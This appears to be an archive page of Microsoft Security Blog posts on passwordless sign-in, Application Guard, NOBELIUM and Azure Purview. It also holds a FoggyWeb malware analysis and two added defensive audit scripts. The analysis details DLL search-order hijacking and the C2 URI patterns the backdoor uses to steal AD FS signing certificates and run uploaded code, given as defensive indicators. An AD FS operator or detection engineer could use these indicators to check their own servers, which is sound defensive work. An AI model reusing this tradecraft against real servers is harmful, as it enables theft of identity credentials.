Archive for September, 2021

3 key resources to accelerate your passwordless journey

September 30th, 2021 No comments

Every organization today faces password-related challenges—phishing campaigns, productivity loss, and password management costs, to name just a few. When it comes to passwords, the risks now outweigh the benefits. Even the strongest passwords are easily phishable and vulnerable to attacks such as password spray and credential stuffing. People don’t like them either: a third of people surveyed say they’d rather abandon a website than reset their password. “I don’t have any more passwords left in me” is becoming an all-too-common feeling. It’s time to look at password alternatives that are both highly secure and convenient. Here are a few key resources that can help you as you plan for and deploy passwordless for your organization.

1. Preparing your organization for passwordless authentication

Today, the technology exists to make sign-ins simpler and more secure. Two protocols, WebAuthn and CTAP2, form what is known as the FIDO2 standard, which lets organizations upgrade their authentication to strong, hardware-backed multifactor options that don’t rely on passwords at all. Instead, you can use a physical security key, a laptop, or a mobile app as your credential. Two questions customers often ask are: which method do I choose, and how do I get started?

I recently published an update to our Passwordless Protection whitepaper, which breaks down the different authentication methods, adoption strategies, and use cases. This guide gives you a great starting point for thinking through your strategy and a foundational understanding of how passwordless authentication works and the requirements for each of the options.

Figure: Workflow showing how administrators, information workers, firstline workers, and consumers arrive at the usability, security, and cost benefits of passwordless authentication.

10 reasons to love passwordless

This year, my colleagues also created a blog series, 10 reasons to love passwordless, which expands on many of the concepts in the whitepaper.

  1. FIDO2-based credentials developed and adopted by the industry.
  2. Compliance with the National Institute of Standards and Technology (NIST) Authenticator Assurance Levels 2 and 3 (AAL2 and AAL3).
  3. Biometric authentication stored locally to uniquely and securely identify users.
  4. Faster sign-ins with Windows Hello built into your PC.
  5. Portable security keys in a variety of form factors that work across platforms.
  6. Helpdesk savings from password reset requests.
  7. Convenient sign-ins with Microsoft Authenticator app on your smartphone.
  8. Phishing-resistant credentials that reduce risk of compromise by over 99.9 percent.
  9. Easy setup and recovery of passwordless credentials with Temporary Access Pass.
  10. No passwords needed for users to be productive and secure.

2. Planning your passwordless deployment

Check out the passwordless authentication deployment guide, which goes in-depth into how to plan the project, deploy different methods, and manage policies for passwordless authentication based on what we’ve learned from thousands of implementations with customers. Use the passwordless recommendations tool in the Microsoft admin console to help you choose the right method for each of your audiences.

Figure: Passwordless sign-in methods: Windows Hello for Business, the Microsoft Authenticator app, and security keys.

You can also get a hands-on tour of passwordless capabilities in Microsoft Azure Active Directory from the video Microsoft Mechanics with Joy Chik, Corporate Vice President, Identity and Network Access, and host Jeremy Chapman.

Figure: Microsoft Mechanics video with Jeremy Chapman and Joy Chik.

3. Learning from experts

Data is useful, but sometimes you want to hear from people with experience. Join security experts on Wednesday, October 13, 2021, from 10:00 AM to 11:30 AM Pacific Time for Your Passwordless Future Starts Now, a digital event where you’ll learn more about passwordless authentication and best practices for adopting an organization-wide passwordless strategy.

You’ll learn how to:

  • Reduce your security risk. Alex Simons, Corporate Vice President, Identity Program Management, Alex Weinert, Director of Identity Security, and Pamela Dingle, Director of Identity Standards, will cover the challenges of passwords that customers have faced and the benefits of moving to passwordless technologies. Passwordless methods like biometrics make it much simpler for people to sign in—and much harder for attackers to implement a successful phishing campaign. Developers also have a role in reducing the risk of passwords, which is why Mike Hanley, the Chief Security Officer at GitHub, will share how they’ve adopted passwordless for app development.
  • Deploy to your organization. If organization-wide passwordless authentication sounds too good to be true, you’ll want to hear from Mark Russinovich, Azure Chief Technology Officer, and Bret Arsenault, Microsoft Chief Security Officer. In this joint session, they will talk about lessons learned from adopting a passwordless strategy at Microsoft and testing the limits on how far passwordless can extend into your hybrid environment.
  • Help make it a smooth transition for users. Transitioning to a passwordless organization isn’t just about the right technology, it’s also about getting people to adopt something new. Charles Duhigg, New York Times bestselling author of The Power of Habit and Smarter, Faster, Better will explain why humans have such a hard time getting passwords right—and why we should stop expecting them to. He will explain the psychology behind password habits and look at history for insights on how cybersecurity leaders can help people be more secure.
  • Make the first step on your Zero Trust journey. You’ll also learn from the host of the event, Vasu Jakkal, Corporate Vice President, Security, Compliance, and Identity, on why passwordless is a necessary component of a Zero Trust security strategy, which starts with the premise that you must explicitly verify every access request. There are financial and human costs with cyberattacks, and she advises on the steps to take to fortify your digital security.

Learn more

Register now for the Your Passwordless Future Starts Now digital event on October 13, 2021. The session will also be available on-demand for a limited time.

For additional resources and the latest customer stories, visit the Microsoft passwordless web page.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 3 key resources to accelerate your passwordless journey appeared first on Microsoft Security Blog.

Categories: cybersecurity

Defend against zero-day exploits with Microsoft Defender Application Guard

September 29th, 2021 No comments

Zero-day security vulnerabilities—known to hackers, but unknown to software creators, security researchers, and the public—are like gold to attackers. With zero-days, or even zero-hours, developers have no time to patch the code, giving hackers enough access and time to explore and map internal networks, exfiltrate valuable data, and find other attack vectors.

Zero-days have become a profit engine for attackers because of the peril they pose to the public, organizations, and governments. These vulnerabilities are often sold on the dark web for thousands of dollars, fueling nation-state and ransomware attacks and making cybercrime even more appealing and profitable.

Social engineering unlocks doors to zero-day attacks

With zero-days now a constant, organizations must defend themselves, paying special attention to user applications, since most zero-day vulnerabilities are found in that layer.

Attackers use social engineering to gain users’ trust, deceive them, and influence their actions—from opening a malicious link in an email to visiting a compromised website. The exploit runs when the application parses the weaponized content, triggering the vulnerability and downloading malware onto the endpoint.

Sophisticated social engineering combined with human-operated ransomware is a lethal combination: the “art of deception” gets the attacker in, and the hands-on-keyboard operator stays hidden while exploiting the system’s vulnerabilities. It creates the perfect scenario for a zero-day attack, letting attackers spread to and compromise more devices than ever before.

App isolation helps defend against zero-day exploits

In such an environment, where application and browser scans and filters alone may not stop attackers from tricking users or prevent malicious code from executing, isolation technology is the way forward for defending against zero-day exploits.

Following the Zero Trust principles of explicit verification, least-privilege access, and assume breach, isolation treats every application and browsing session as untrustworthy by default, adding multiple roadblocks for attackers trying to reach the user’s environment.

Isolation is built into the Windows chip-to-cloud security posture: compatible applications run inside virtualization technology such as Microsoft Defender Application Guard (Application Guard), which significantly reduces the blast radius if one of those applications is compromised.

With Application Guard, websites and Office files run in an isolated Hyper-V-based container, so anything that happens within the container stays isolated from the desktop operating system. If malicious code originates from a document or website running inside the container, the desktop remains intact and the blast radius of the infection is confined to the container.

This is the same virtualization-based security (VBS) technology that also powers other Windows security features like Credential Guard and Hypervisor Code Integrity (HVCI).

Figure: Hardware isolation of Microsoft Edge and Microsoft Office. Device hardware flows through the kernel into the Windows platform before reaching Microsoft Office, Microsoft Edge, and apps.

Today, Application Guard’s local isolation is natively built into Microsoft Edge and Microsoft Office, providing seamless protection against malicious Word, PowerPoint, and Excel files as well as malicious websites. We have extended this protection to Google Chrome and Mozilla Firefox via the Application Guard plugin, which opens untrusted websites in isolation using Microsoft Edge.

Application Guard delivers a strong first line of defense for organizations: when users run an app, open an email attachment, or click a link or URL, any malware it carries is contained in the isolated environment and cannot reach the desktop, its systems, or its data. Additionally, every malicious attack contained by Application Guard helps inform and improve global threat intelligence, enhancing overall detection capabilities and protecting not only your organization but also millions of other Microsoft customers across the world.

Application Guard for Zero Trust

Isolation is an important part of any organization’s Zero Trust strategy: it defends your systems from compromise without jeopardizing performance or productivity.

Isolation technology in Windows forms the backbone of Application Guard, and it maps onto the three Zero Trust principles below, providing stronger protection and greater assurance to your users while letting them click anywhere.

  • Verify explicitly: Admins can configure device health attestation policies using Microsoft Intune. Together with Conditional Access, these policies verify and attest that Windows booted with Secure Boot enabled, so the hypervisor booted correctly and the Application Guard container can be trusted to be isolated.
  • Least privilege: The hardware-isolated container used by Application Guard implements its own kernel and user space and has no access to the user’s desktop or other trusted enterprise resources.
  • Assume breach: For all purposes, the container is treated as untrustworthy and is used only to run untrusted content. No user data or identity is present inside the container, and the untrusted content is assumed to contain malicious code.
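A check an administrator would want before relying on the picture above, added here as an example and not part of the Microsoft post: it reads the virtualization-based security state that Windows exposes through the Win32_DeviceGuard CIM class, the optional-feature state of Application Guard, and whether a hypervisor is actually loaded. The registry value name AllowAppHVSI_ProviderSet is assumed to be the one the “Managed Mode” group policy writes; confirm it against your ADMX before depending on it.

```powershell
# Added example, not from the Microsoft post. Run in an elevated PowerShell
# session on a Windows 10/11 client.
function Get-IsolationStatus {
    # Win32_DeviceGuard reports the VBS stack that Application Guard shares with
    # Credential Guard and HVCI. VirtualizationBasedSecurityStatus:
    #   0 = not enabled, 1 = enabled but not running, 2 = running.
    # SecurityServicesRunning holds 1 for Credential Guard and 2 for HVCI.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName 'Win32_DeviceGuard'

    # Is a hypervisor actually loaded? The container cannot start without one.
    $hvPresent = (Get-CimInstance -ClassName 'Win32_ComputerSystem').HypervisorPresent

    # Application Guard ships as an optional feature; State is Enabled or Disabled.
    $mdag = Get-WindowsOptionalFeature -Online -FeatureName 'Windows-Defender-ApplicationGuard'

    # Managed Mode policy value (assumed name, taken from the ADMX for
    # "Turn on Microsoft Defender Application Guard in Managed Mode"):
    #   1 = Edge, 2 = Office, 3 = both; absent = not configured.
    $pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\AppHVSI' `
                            -Name 'AllowAppHVSI_ProviderSet' -ErrorAction SilentlyContinue

    [pscustomobject]@{
        HypervisorPresent       = [bool]$hvPresent
        VbsRunning              = ($dg.VirtualizationBasedSecurityStatus -eq 2)
        HvciRunning             = ($dg.SecurityServicesRunning -contains 2)
        CredentialGuardRunning  = ($dg.SecurityServicesRunning -contains 1)
        ApplicationGuardFeature = [string]$mdag.State
        ManagedModeProviders    = $(if ($pol) { $pol.AllowAppHVSI_ProviderSet } else { 'not configured' })
    }
}

$status = Get-IsolationStatus
$status | Format-List

# "Verify explicitly" in practice: a feature that is enabled but has no
# hypervisor underneath it provides no isolation at all, so flag that state.
if ($status.ApplicationGuardFeature -eq 'Enabled' -and -not $status.HypervisorPresent) {
    Write-Warning 'Application Guard is enabled but no hypervisor is running; check VT-x/AMD-V and SLAT in firmware and the Hyper-V platform feature.'
}
if ($status.ApplicationGuardFeature -ne 'Enabled') {
    Write-Output 'To install: Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-ApplicationGuard'
}
```

On a fleet, the same object is what you would feed into an Intune compliance or Conditional Access decision: the attestation policy in the bullet above is only meaningful if VbsRunning and HypervisorPresent are true on the device being admitted.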

Learn more

For more information, check out:


The post Defend against zero-day exploits with Microsoft Defender Application Guard appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust

How nation-state attackers like NOBELIUM are changing cybersecurity

September 28th, 2021 No comments

This is the first post in a four-part series on the NOBELIUM nation-state cyberattack. Microsoft started telling the industry about this extremely advanced cyberattack in December 2020. The NOBELIUM blog series—which mirrors Microsoft’s four-part video series “Decoding NOBELIUM”—will pull the curtain back on the world of threat detection and showcase insights from cybersecurity professionals on the front lines, both Microsoft defenders and other industry experts.

In many ways, the NOBELIUM nation-state cyberattack realized the deepest fears of United States cybersecurity experts, according to Microsoft 365 Security Corporate Vice President Rob Lefferts. It was a supply chain attack. It was methodically planned and executed. And it impacted multiple world-class companies with strong security teams. Perhaps, your company was one of them—or perhaps you know someone who works at a company that was affected. As we begin Cybersecurity Awareness Month in October, the far-reaching nature of such attacks is ever-present on our minds, which is one reason why more than 3,500 Microsoft security experts actively defend and protect organizations from cyberattacks every day.

Nation-state attacks are malicious cyberattacks that originate from a particular country and are an attempt to further that country’s interests. Numerous organizations were impacted by the NOBELIUM attacks. Such attacks are fueled by geopolitical competition and a desire to gain an advantage over other nations, such as by stealing intellectual property for economic benefit or supporting traditional espionage.

In December 2020, Microsoft began sharing information with the cybersecurity industry on what would become widely recognized as the most sophisticated nation-state cyberattack in history. NOBELIUM, a group of Russia-based hackers, gained access to multiple enterprises through vulnerable software code, stolen passwords, compromised on-premises servers, and minted SAML tokens.

In this supply chain attack, hackers were able to access the SolarWinds code, slip malicious code into a piece of the software, and use the vendor’s legitimate software updates to spread their malware to customer systems. Successful attacks gave NOBELIUM hackers high-level permissions on the downstream compromised systems.

Why should enterprises worry about nation-state attacks?

Historically, nation-state actors directly targeted the infrastructure, think tanks, and governments of other countries. As those targets improve their defenses, sophisticated actors look for new ways in through the vendors, software, and networks their targets rely upon. Enterprises are also increasingly at risk as nation-state actors expand their objectives to intellectual property theft. As a result, enterprises are often targeted as a path into the networks of their customers, partners, or vendors, through the enterprise’s own network or software. The Microsoft Threat Intelligence Center, which collects billions of data points to gather threat intelligence, has observed that enterprises are increasingly at risk of these attacks.

Consider these statistics, which show the magnitude of security threat from nation-state attacks:

  • 35 percent of all nation-state attacks are targeted at enterprises, according to the CSO article, “Nation states: Cyberconflict, and the Web of Profit.”1
  • 78 percent increase in attacks on supply chain vendors, according to the CPO Magazine article “HP Study: Nation-state Cyber Attacks Double Between 2017 and 2020 as World Edges Toward Open Cyber Warfare.”2
  • 13,000 nation-state attack alerts emailed to customers during the past two years, according to the September 2020 Microsoft Digital Defense Report.

Unlike other types of cybercriminals, who exploit a vulnerability and move on, nation-state attackers are persistent and determined to achieve their objectives. They invest serious time profiling their targets and probing their network for vulnerabilities and are continually adding more tools and skills to their capabilities. Any organization—regardless of size—could be a potential target.

Another reason the NOBELIUM attack matters to the enterprise is that state-sponsored attackers often have unlimited monetary and technical support from their countries, giving them access to unique, modern hacking techniques and tactics.

“Nation-state actors are hard because they effectively have infinite funding and they’re above the law – at least in their country,” said Roberto, Principal Consultant and Lead Investigator of the Microsoft Detection and Response Team. “They have very good technical resources, so it’s not like they’re going to give up. It’s one of the reasons we put in the 80-hour weeks.”

NOBELIUM’s long-term impact

How did the NOBELIUM attack unfold and how has it changed cybersecurity? In the first episode of our four-part video series Decoding NOBELIUM: When Nation-States Attack, security professionals share behind-the-scenes details and weigh in on the lasting impacts of the NOBELIUM attack on cybersecurity. Watch the episode to learn security strategies you can implement in your organization, like which vulnerabilities to patch.

Microsoft is committed to helping organizations stay protected from cyberattacks, whether cybercriminal or nation-state. In particular, nation-state adversaries have significant expertise and resources and will develop new attack patterns with the specific intent of furthering their geopolitical objectives. Consistent with our mission to provide security for all, Microsoft will continue to use our leading threat intelligence and global team of dedicated cybersecurity defenders to help protect our customers and the world. Just two recent examples of Microsoft’s efforts to combat nation-state attacks are the September 2021 discovery and investigation of NOBELIUM malware referred to as FoggyWeb and our May 2021 profiling of NOBELIUM’s early-stage toolset comprising EnvyScout, BoomBox, NativeZone, and VaporRage.

For immediate support, reach out to the Microsoft Security Response Center. Keep an eye out for future posts in the NOBELIUM nation-state attack series. In these posts, we’ll share the story of how we discovered the attack, how we fought the threat, and how the attack has shaped the future of cybersecurity.



1 Nation States, Cyberconflict, and the Web of Profit, CSO, 2021.

2 HP Study: Nation-State Cyber Attacks Double Between 2017 and 2020 as World Edges Toward Open Cyber Warfare, Scott Ikeda, CPO Magazine, 22 April 2021.

The post How nation-state attackers like NOBELIUM are changing cybersecurity appeared first on Microsoft Security Blog.

Categories: cybersecurity, NOBELIUM

A simpler, more integrated approach to data governance

September 28th, 2021 No comments

It’s no secret that the volume of data created by organizations and people multiplies daily. And, in the digital—and hybrid work—world we live in, that data is spread across more tools, platforms, devices, and clouds than ever before, creating regulatory challenges and security risks.

Organizations must understand what data they have and where it lives, how it is used, and critically, how it’s all governed. How an organization stores its data and how long it is kept is not just a regulatory compliance issue, but also a security issue.

Today, I’m excited to share the general availability of Microsoft Azure Purview, giving organizations that holistic understanding of their data that is so critically important. Azure Purview addresses the need for full visibility across all the places where your data lives, making it easier to manage, glean insights, and govern.

Whether your data is housed on-premises in services like Microsoft SQL Server and Oracle, in different clouds like Amazon Web Services (AWS) S3, or in software as a service (SaaS) applications like Salesforce, with Azure Purview you can easily create a unified map of your data assets and their relationships with automated data discovery and sensitive data classification, get insight into the location and movement of data across your hybrid landscape, and empower data consumers to find valuable data through a data catalog.

For more details about Azure Purview, check out the Azure Purview blog today.

Simplifying data protection and governance management

Managing an organization’s data from a protection and governance perspective can be simplified with Azure Purview and Microsoft Information Protection (MIP). MIP is a built-in, intelligent, unified, and extensible solution to protect sensitive data in documents and emails across your organization. MIP provides a unified set of capabilities to know and protect your data and prevent data loss across Microsoft 365 apps (like Word, PowerPoint, Excel, and Outlook), services (like Microsoft Teams, SharePoint, Exchange, and Microsoft Power BI), on-premises locations (like SharePoint Server and on-premises file shares), devices, and third-party apps and services (like Box and Dropbox).

Azure Purview integrates with MIP so that you can apply the same sensitivity labels defined in the Microsoft 365 Compliance Center to data assets in Azure Purview. This helps you have a comprehensive view of your data across your entire estate so you know where your sensitive data lies and can govern it accordingly.

This integration also lets you write your policies once in MIP and apply them in Azure Purview, streamlining and integrating governance and protection. So, if you are already using MIP to apply sensitivity labels to data covered by the General Data Protection Regulation (GDPR), that label now also applies to data governed in Azure Purview. From emails to databases, MIP and Azure Purview give you a simplified, integrated approach to governance.

The journey to simplifying the complexity of data governance

For organizations to overcome uncertainty about the safety of their data today, not to mention the complexity of data regulations, they need a bird’s-eye view of all their data. Taking an integrated and simpler approach to data governance will not only help you better understand and analyze your data but also reduce your attack surface. In today’s environment, this is a must.


The post A simpler, more integrated approach to data governance appeared first on Microsoft Security Blog.

Categories: cybersecurity

FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor

September 27th, 2021 No comments

Microsoft continues to work with partners and customers to track and expand our knowledge of the threat actor we refer to as NOBELIUM, the actor behind the SUNBURST backdoor, TEARDROP malware, and related components. As we stated before, we suspect that NOBELIUM can draw from significant operational resources often showcased in their campaigns, including custom-built malware and tools. In March 2021, we profiled NOBELIUM’s GoldMax, GoldFinder, and Sibot malware, which it uses for layered persistence. We then followed that up with another post in May, when we analyzed the actor’s early-stage toolset comprising EnvyScout, BoomBox, NativeZone, and VaporRage.

This blog is another in-depth analysis of newly detected NOBELIUM malware: a post-exploitation backdoor that Microsoft Threat Intelligence Center (MSTIC) refers to as FoggyWeb. As mentioned in previous blogs, NOBELIUM employs multiple tactics to pursue credential theft with the objective of gaining admin-level access to Active Directory Federation Services (AD FS) servers. Once NOBELIUM obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools. NOBELIUM uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing certificate, and token-decryption certificate, as well as to download and execute additional components. Use of FoggyWeb has been observed in the wild as early as April 2021.

Microsoft has notified all customers observed being targeted or compromised by this activity. If you believe your organization has been compromised, we recommend that you

  • Audit your on-premises and cloud infrastructure, including configuration, per-user and per-app settings, forwarding rules, and other changes the actor might have made to maintain their access.
  • Remove user and app access, review configurations for each, and re-issue new, strong credentials following documented industry best practices.
  • Use a hardware security module (HSM) as described in securing AD FS servers to prevent the exfiltration of secrets by FoggyWeb.

Microsoft security products have implemented detections and protections against this malware. Indicators of compromise (IOCs), mitigation guidance, detection details, and hunting queries for Azure Sentinel and Microsoft 365 Defender customers are provided at the end of this analysis and in the product portals. Active Directory Federation Services (AD FS) servers run on-premises and customers can also follow detailed guidance on securing AD FS servers against attacks.

FoggyWeb: Backdoor targeting AD FS

FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server.

After compromising an AD FS server, NOBELIUM was observed dropping the following two files on the system (administrative privileges are required to write these files to the folders listed below):

  • %WinDir%\ADFS\version.dll
  • %WinDir%\SystemResources\Windows.Data.TimeZones\pris\Windows.Data.TimeZones.zh-PH.pri

FoggyWeb is stored in the encrypted file Windows.Data.TimeZones.zh-PH.pri, while the malicious version.dll is its loader. The AD FS service executable Microsoft.IdentityServer.ServiceHost.exe loads that DLL via DLL search order hijacking involving the core Common Language Runtime (CLR) DLLs (described in detail in the FoggyWeb loader section). The loader reads the encrypted FoggyWeb backdoor file and uses a custom Lightweight Encryption Algorithm (LEA) routine to decrypt the backdoor in memory.

After de-obfuscating the backdoor, the loader proceeds to load FoggyWeb in the execution context of the AD FS application. The loader, an unmanaged application, leverages the CLR hosting interfaces and APIs to load the backdoor, a managed DLL, in the same Application Domain within which the legitimate AD FS managed code is executed. This grants the backdoor access to the AD FS codebase and resources, including the AD FS configuration database (as it inherits the AD FS service account permissions required to access the configuration database).

Figure: Structure of Microsoft.IdentityServer.ServiceHost.exe after loading version.dll.

When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target’s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target):

  • HTTP GET URI pattern:
    • /adfs/portal/images/theme/light01/profile.webp
    • /adfs/portal/images/theme/light01/background.webp
    • /adfs/portal/images/theme/light01/logo.webp
  • HTTP POST URI pattern:
    • /adfs/services/trust/2005/samlmixed/upload

Each HTTP GET/POST URI pattern above corresponds to a C2 command:

  • When the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/profile.webp, the backdoor retrieves the token signing certificate of the compromised AD FS server and then obfuscates and returns the certificate to the issuer of the request.
  • Similarly, when the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/background.webp, the backdoor retrieves the token decryption certificate of the compromised AD FS server and then obfuscates and returns the certificate to the issuer of the request.
  • When the AD FS server receives an HTTP GET request containing the URI pattern /adfs/portal/images/theme/light01/logo.webp, the backdoor retrieves the AD FS configuration data of the compromised server, obfuscates the data, and returns the obfuscated data to the issuer of the request.
  • When the AD FS server receives an HTTP POST request containing the URI pattern /adfs/services/trust/2005/samlmixed/upload, the backdoor treats the obfuscated and compressed POST data as either .NET assembly or source code. If assembly, the backdoor executes the assembly in the execution context of the AD FS process. If source code, the backdoor dynamically compiles the source code and proceeds to execute the resulting memory-resident assembly in the execution context of the AD FS process.

The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server.

Figure: FoggyWeb attack chain.

Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account. Also, because FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatic access to the legitimate AD FS classes, methods, properties, fields, objects, and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations. For example, this allows FoggyWeb to gain access to the AD FS configuration data without connecting to the WID named pipe or manually running SQL queries to retrieve configuration information (for example, to obtain the EncryptedPfx blob from the configuration data). FoggyWeb is also AD FS version-agnostic; it does not need to keep track of legacy versus modern configuration table names and schemas, named pipe names, and other version-dependent properties of AD FS.

FoggyWeb loader

The file version.dll is a malicious loader responsible for loading an encrypted backdoor file from the file system, decrypting the backdoor file, and loading it in memory. This malicious DLL, which shares a name with a legitimate Windows DLL located in the %WinDir%\System32\ folder, is meant to be placed in the main AD FS folder %WinDir%\ADFS\, where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located (for reasons described later in this section).

When the AD FS service (adfssrv) is started, the service executable Microsoft.IdentityServer.ServiceHost.exe gets executed. As a .NET-based managed application, Microsoft.IdentityServer.ServiceHost.exe imports an unmanaged Windows DLL named mscoree.dll.

Screenshot showing Microsoft.IdentityServer.ServiceHost.exe importing mscoree.dll.

The file mscoree.dll dynamically loads another unmanaged Windows/CLR DLL named mscoreei.dll. As shown below, mscoreei.dll has a delay load import (Delay Import) named version.dll.

Screenshot showing mscoreei.dll has a delay load import (Delay Import) named version.dll

NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%\ADFS\ folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll. Once loaded, instead of loading the legitimate version.dll from the %WinDir%\System32\ folder, mscoreei.dll loads the malicious version.dll planted by the attacker in the %WinDir%\ADFS\ folder (a technique referred to as DLL search order hijacking), as shown in the call stack below.

Screenshot of the call stack showing mscoreei.dll loading the malicious version.dll planted by the attacker in the %WinDir%\ADFS\ folder

The malicious loader version.dll behaves as a proxy for all legitimate version.dll export function calls. As shown below, it exports the same 17 function names as the legitimate version of version.dll.

Screenshot of the export dump of the legitimate version.dll

Screenshot of the export dump of the malicious version.dll

The export functions of the malicious version.dll are all short stubs that call a single trampoline function labeled TrampolineFunction, as seen in the screenshot below.

Screenshot of the export functions of the malicious version.dll

Below is the pseudocode for the trampoline function.

Screenshot of pseudocode for the trampoline function

This trampoline function is responsible for the following:

  • Calling a function (labeled LoadDecryptExecuteBackdoor() by the analyst) to load a backdoor file from the file system, then decrypt and execute the file in memory
  • Transferring execution to the originally called target function from the legitimate version of version.dll.

The trampoline function preserves the values of the arguments/registers intended for the function from the legitimate version of version.dll by saving certain CPU registers: it pushes them onto the stack before calling the LoadDecryptExecuteBackdoor() function above and restores them before transferring execution to the function from the legitimate version of version.dll.

Screenshot of code showing how the trampoline function preserves the values of the arguments/registers intended for the function from the legitimate version of version.dll by saving certain CPU registers

When called, LoadDecryptExecuteBackdoor() attempts to create a Windows event named {2783c149-77a7-5e51-0d83-ac0566daff96} to ensure that only one copy of the loader is actively running on the system. In a new thread, it then checks if the following file is present (hardcoded path string):

C:\Windows\SystemResources\Windows.Data.TimeZones\pris\Windows.Data.TimeZones.zh-PH.pri

Windows.Data.TimeZones.zh-PH.pri is an encrypted backdoor file that is placed in the folder above. MSTIC refers to this backdoor file as FoggyWeb, and our analysis is in the next section.
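The two on-disk artifacts described in this section (a version.dll planted beside the AD FS service binary so that it shadows the System32 copy, and the encrypted backdoor file at its hardcoded path) can be checked for with a small audit. This is an added example, not code from the Microsoft post; it assumes the Windows folder layout the post describes and builds a constructed temporary tree in that layout for the demonstration.

```python
"""Audit an AD FS host for the two FoggyWeb on-disk artifacts.

Added example, not code from the Microsoft blog post. It looks for
(1) a DLL in the AD FS folder whose name also exists in System32 (the
version.dll search-order hijack) and (2) the hardcoded encrypted backdoor
file path. The Windows root is a parameter so the audit can run against
a constructed directory tree, as demo() does; on a real host pass the
%WinDir% path instead.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Locations relative to the Windows folder, as given in the blog post.
ADFS_DIR = Path("ADFS")
SYSTEM32_DIR = Path("System32")
BACKDOOR_FILE = (
    Path("SystemResources") / "Windows.Data.TimeZones" / "pris" / "Windows.Data.TimeZones.zh-PH.pri"
)


def sha256_of(path: Path) -> str:
    """Hex SHA-256 of a file, for comparison against published indicators."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def shadowed_dlls(adfs_dir: Path, system32_dir: Path) -> List[Path]:
    """DLLs in the AD FS folder whose names also exist in System32.

    A delay-loaded import such as version.dll is resolved from the
    application directory before System32, so any such duplicate is a
    hijack candidate. Compare hits with a known-good baseline of the
    AD FS folder before treating them as malicious.
    """
    system_names = {p.name.lower() for p in system32_dir.glob("*.dll")}
    return sorted(p for p in adfs_dir.glob("*.dll") if p.name.lower() in system_names)


def audit(windir: Path) -> List[Dict[str, str]]:
    """Return findings as dicts with kind, path and sha256."""
    findings = []
    for dll in shadowed_dlls(windir / ADFS_DIR, windir / SYSTEM32_DIR):
        findings.append({"kind": "shadowed_dll", "path": str(dll), "sha256": sha256_of(dll)})
    backdoor = windir / BACKDOOR_FILE
    if backdoor.is_file():
        findings.append(
            {"kind": "encrypted_backdoor_file", "path": str(backdoor), "sha256": sha256_of(backdoor)}
        )
    return findings


def build_sample_tree(windir: Path) -> None:
    """Constructed layout: a clean System32, an AD FS folder holding the
    service binaries plus a planted version.dll, and the backdoor file.
    All file contents are placeholders, not real samples."""
    (windir / SYSTEM32_DIR).mkdir(parents=True)
    (windir / SYSTEM32_DIR / "version.dll").write_bytes(b"legitimate version.dll (placeholder)")
    (windir / SYSTEM32_DIR / "mscoree.dll").write_bytes(b"legitimate mscoree.dll (placeholder)")
    (windir / ADFS_DIR).mkdir(parents=True)
    (windir / ADFS_DIR / "Microsoft.IdentityServer.ServiceHost.exe").write_bytes(b"placeholder")
    (windir / ADFS_DIR / "Microsoft.IdentityServer.dll").write_bytes(b"placeholder")
    (windir / ADFS_DIR / "version.dll").write_bytes(b"planted loader (placeholder)")
    (windir / BACKDOOR_FILE).parent.mkdir(parents=True)
    (windir / BACKDOOR_FILE).write_bytes(b"encrypted backdoor (placeholder)")


def demo() -> List[str]:
    """Run the audit on the constructed tree; returns 'kind:filename' strings."""
    with tempfile.TemporaryDirectory() as tmp:
        windir = Path(tmp) / "Windows"
        build_sample_tree(windir)
        return [f"{f['kind']}:{Path(f['path']).name}" for f in audit(windir)]


if __name__ == "__main__":
    for line in demo():
        print(line)
```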

Microsoft.IdentityServer.ServiceHost.exe is itself an unmanaged Windows executable that is generated when the high-level AD FS managed code is compiled. When executed, the unmanaged code inside Microsoft.IdentityServer.ServiceHost.exe leverages the Common Language Runtime (CLR) to run the managed AD FS code within a virtual runtime environment. This virtual runtime environment consists of one or more application domains, which provide a unit of isolation for the runtime environment and allow different applications to run inside separate containers within a process. The managed AD FS code is executed within an application domain inside the virtual runtime environment.

